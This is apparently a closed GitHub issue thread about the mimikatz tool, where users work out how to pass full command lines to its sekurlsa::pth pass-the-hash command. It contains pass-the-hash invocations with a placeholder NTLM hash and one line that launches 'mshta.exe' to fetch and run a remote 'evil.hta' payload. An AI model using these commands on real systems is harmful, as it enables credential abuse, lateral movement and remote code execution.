Closed MichaelGrafnetter closed 8 years ago
Hi Michael,
I think you missed it: https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth
It's the /run:foo
One "not documented yet" argument is /impersonate to affect the new token to the current mimikatz thread :)
Thx for your reply. I know about the /run parameter, but I did not know that you can pass the whole command line to it.
But I still have not figured out a way to use it in batch mode, e.g. from BAT or PS1 scripts, which is the way I use mimikatz mostly. This has not worked for me:
mimikatz.exe sekurlsa::pth /user:Administrator /domain:contoso.com /ntlm:ba8098ba09890a80b9a8098b "/run:cmd.exe /c systeminfo" exit
It's: /run"foo bar" but arguments problem/escaping is always hard.
On my side I deal with argv[], so it's external to mimikatz to push it in the right way ;)
If I remember well, with PowerShell, you can push arguments in an array.
Neither /run"foo bar", nor /run:"foo bar" works for me :-( PowerShell is not helpful, either, because the entire command line has to be passed as a single string:
.\mimikatz.exe "sekurlsa::pth /user:$userName /domain:$domain /ntlm:$hash /run:cmd.exe" exit
But never mind, it is not that important. I just thought there would be a trivial solution.
This approach permits passing NOT only a single string and worked for me:
.\mimikatz.exe
mimikatz # sekurlsa::pth /user:$userName /domain:$domain /ntlm:$hash /run:"mshta.exe http://ip/evil.hta"
Hi Ben, I just wonder if you could add support for passing command line parameters to the binaries executed by sekurlsa::pth. Or have I just missed this feature? And thx again for your great work.